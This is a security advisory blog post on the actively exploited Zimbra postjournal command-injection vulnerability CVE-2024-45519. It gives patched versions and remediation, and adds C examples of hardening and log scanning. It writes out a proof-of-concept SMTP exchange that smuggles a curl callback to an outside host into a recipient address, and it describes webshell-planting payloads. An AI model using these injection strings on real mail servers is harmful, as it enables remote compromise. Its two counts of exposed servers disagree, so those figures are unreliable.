Zimbra Remote Code Execution Vulnerability Under Active Attack
Key Takeaways
A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.
A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.
The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.
Overview
A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.
The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.
Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.
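The popen-versus-execvp point above, as an added C example written for this article (constructed illustration, not Zimbra's postjournal code): a vulnerable command-line builder that interpolates the recipient inside double quotes, a check for the characters a POSIX shell still expands inside those quotes, and a hardened path that allow-lists the address and then launches the helper through fork/execvp with an argv vector so no shell ever parses it. The helper path /opt/mail/deliver-helper, the function names and the sample addresses are hypothetical.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_ADDR 254

/* Vulnerable pattern (constructed, not Zimbra's code). The recipient is
 * interpolated into a shell command line and wrapped in double quotes.
 * Inside double quotes the shell treats ; | & > as literal characters,
 * but it still performs $(...) and `...` command substitution and ${...}
 * parameter expansion, so a recipient such as x$(id)@example.com runs id
 * when the string reaches popen. */
static int build_popen_cmdline(const char *recipient, char *out, size_t outlen)
{
    /* HYPOTHETICAL helper path standing in for the launched program. */
    int n = snprintf(out, outlen, "/opt/mail/deliver-helper \"%s\"", recipient);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Characters that remain active inside a double-quoted shell word. */
static bool expands_inside_dquotes(const char *s)
{
    return strpbrk(s, "$`\\\"") != NULL;
}

/* Hardened step 1: allow-list validation. Accept only characters common in
 * real addresses, exactly one '@', non-empty local part and domain, and a
 * bounded length. Anything else is rejected before a process is spawned. */
static bool is_safe_address(const char *addr)
{
    size_t len = strlen(addr);
    if (len == 0 || len > MAX_ADDR) return false;
    const char *at = strchr(addr, '@');
    if (at == NULL || at == addr || at[1] == '\0' || strchr(at + 1, '@') != NULL)
        return false;
    for (const char *p = addr; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (isalnum(c) || c == '.' || c == '_' || c == '-' || c == '+' || c == '@')
            continue;
        return false;
    }
    return true;
}

/* Hardened step 2: run the helper with fork/execvp and an argv vector. No
 * shell sees the recipient, so it arrives as one literal argument whatever
 * it contains. Returns the child's exit status, or -1 on rejection/error. */
static int run_helper_noshell(const char *helper, const char *recipient)
{
    if (!is_safe_address(recipient)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)helper, (char *)recipient, NULL };
        execvp(helper, argv);
        _exit(127);                      /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample inputs. */
    const char *benign = "alice.smith+lists@example.com";
    const char *hostile = "x$(id)@example.com";
    char cmd[512];

    build_popen_cmdline(hostile, cmd, sizeof cmd);
    printf("popen would receive: %s\n", cmd);
    printf("  shell expands inside the quotes: %s\n",
           expands_inside_dquotes(hostile) ? "yes" : "no");
    printf("allow-list: %s -> %s\n", benign,
           is_safe_address(benign) ? "accept" : "reject");
    printf("allow-list: %s -> %s\n", hostile,
           is_safe_address(hostile) ? "accept" : "reject");

    /* /bin/echo prints its argument verbatim: nothing is ever expanded. */
    printf("helper exit status: %d\n", run_helper_noshell("/bin/echo", benign));
    return 0;
}
```

Build with cc -Wall and run; the hostile address is rejected by the allow-list, and the benign one is passed to /bin/echo as a single argv entry. The two hardening steps are independent: the argv vector alone already removes the shell from the path, and the allow-list additionally keeps unexpected input out of the helper.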
The following versions and newer are patched:
9.0.0 Patch 41
10.0.9
10.1.1
8.8.15 Patch 46
One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.
Technical Analysis
Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.
The researchers reversed the postjournal binary and found no calls to execvp or to the run_command function. Instead, the read_maps function called popen directly, so input reached the shell without sanitization. Wrapping the cmd argument in double quotes before passing it to popen blocks injection with simple shell metacharacters, but the shell still performs $() command substitution inside double quotes, so that control could be bypassed.
The postjournal service was then exploited via port 10027 with the following SMTP commands:
EHLO localhost
MAIL FROM: <aaaa@mail.domain.com>
RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>
DATA
Test message
.
The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:
zmlocalconfig -e postjournal_enabled=true
zmcontrol restart
The researchers also found that the default mynetworks configuration included a /20 CIDR range containing their public IP address, so the exploit could be performed remotely when the postjournal service is enabled and the attacker's address falls within that allowed network range.
Proofpoint researchers have observed the vulnerability under exploitation, with spoofed emails sent to fake addresses in CC fields in an attempt to get Zimbra servers to parse and execute those addresses as commands. The addresses contained base64 strings that are executed with the sh utility.
Some of the emails used CC'd addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and when concatenated, the base64 blobs decode to a command that writes a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).
Once installed, the webshell listens for inbound connections and supports command execution via exec, or download-and-execute over a socket connection.
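The exploitation pattern just described, where the payload rides inside a recipient address, is something a defender can look for in mail-flow logs. The following scanner is an added example written for this article (not Cyble's or Proofpoint's tooling): it pulls every <...> address token out of each log line and flags those whose local part is an RFC 5321 quoted string or carries characters a POSIX shell expands inside double quotes. The Postfix-style log layout, host names and addresses are constructed, and the substitution payloads in them are inert placeholders.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed Postfix-style log lines (not real traffic). Three of the five
 * recipient addresses carry shell-substitution syntax in a quoted local
 * part; the payloads are inert placeholders. */
static const char *const SAMPLE_LOG[] = {
    "Oct  1 09:12:01 mx1 postfix/smtpd[2214]: from=<alice@example.com> to=<bob@corp.example> proto=ESMTP",
    "Oct  1 09:12:07 mx1 postfix/smtpd[2214]: from=<news@example.net> to=<\"team$(id)\"@corp.example> proto=ESMTP",
    "Oct  1 09:12:09 mx1 postfix/smtpd[2219]: from=<x@example.org> to=<carol.jones+ops@corp.example> proto=ESMTP",
    "Oct  1 09:12:15 mx1 postfix/smtpd[2219]: from=<y@example.org> to=<\"ops${IFS}x\"@corp.example> proto=ESMTP",
    "Oct  1 09:12:20 mx1 postfix/smtpd[2220]: from=<z@example.org> to=<\"dev`date`\"@corp.example> proto=ESMTP",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* Does one address look like a shell-expansion attempt? The checks are
 * deliberately narrow: a quoted local part (rare in legitimate mail, but
 * needed to smuggle most of these characters through an SMTP address), or
 * any character a POSIX shell still expands inside double quotes. */
static bool suspicious_local_part(const char *addr)
{
    const char *at = strrchr(addr, '@');
    size_t local_len = at ? (size_t)(at - addr) : strlen(addr);
    if (local_len > 0 && addr[0] == '"') return true;
    for (size_t i = 0; i < local_len; i++)
        if (addr[i] == '$' || addr[i] == '`' || addr[i] == '\\') return true;
    return false;
}

/* Extract every <...> token from one log line and run the check on each.
 * The first suspicious address is copied into out. Returns true if any
 * address in the line was flagged. */
static bool scan_line(const char *line, char *out, size_t outlen)
{
    const char *p = line;
    while ((p = strchr(p, '<')) != NULL) {
        const char *end = strchr(p + 1, '>');
        if (end == NULL) break;
        size_t len = (size_t)(end - p - 1);
        char addr[320];
        if (len < sizeof addr) {
            memcpy(addr, p + 1, len);
            addr[len] = '\0';
            if (suspicious_local_part(addr)) {
                snprintf(out, outlen, "%s", addr);
                return true;
            }
        }
        p = end + 1;
    }
    return false;
}

/* Number of lines in which at least one address was flagged. */
static size_t count_suspicious(const char *const *lines, size_t n)
{
    size_t hits = 0;
    char addr[320];
    for (size_t i = 0; i < n; i++)
        if (scan_line(lines[i], addr, sizeof addr)) hits++;
    return hits;
}

int main(void)
{
    char addr[320];
    for (size_t i = 0; i < SAMPLE_LOG_LEN; i++)
        if (scan_line(SAMPLE_LOG[i], addr, sizeof addr))
            printf("FLAG line %zu: %s\n", i + 1, addr);
    printf("%zu of %zu lines flagged\n",
           count_suspicious(SAMPLE_LOG, SAMPLE_LOG_LEN), SAMPLE_LOG_LEN);
    return 0;
}
```

Run against real logs, read lines from stdin instead of the embedded array; the check itself is format-agnostic because it only keys on the <...> tokens. Quoted local parts do occur in legitimate mail, so treat a hit as a triage signal to be correlated with the postjournal_enabled setting and the mynetworks range rather than as a verdict on its own.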
Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:
cveID           vendorProject  product                    vulnerabilityName
CVE-2023-37580  Zimbra         Collaboration (ZCS)        Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-27926  Zimbra         Collaboration (ZCS)        Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-41352  Zimbra         Collaboration (ZCS)        Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-27925  Zimbra         Collaboration (ZCS)        Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-37042  Zimbra         Collaboration (ZCS)        Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability
CVE-2022-27924  Zimbra         Collaboration (ZCS)        Zimbra Collaboration (ZCS) Command Injection Vulnerability
CVE-2018-6882   Zimbra         Collaboration Suite (ZCS)  Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-24682  Zimbra         Webmail                    Zimbra Webmail Cross-Site Scripting Vulnerability
While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.
Recommendations
All Zimbra administrators should:
Disable postjournal if not needed
Configure mynetworks to prevent unauthorized access
Apply the latest security updates directly from Zimbra
The post Zimbra Remote Code Execution Vulnerability Under Active Attack appeared first on Cyble.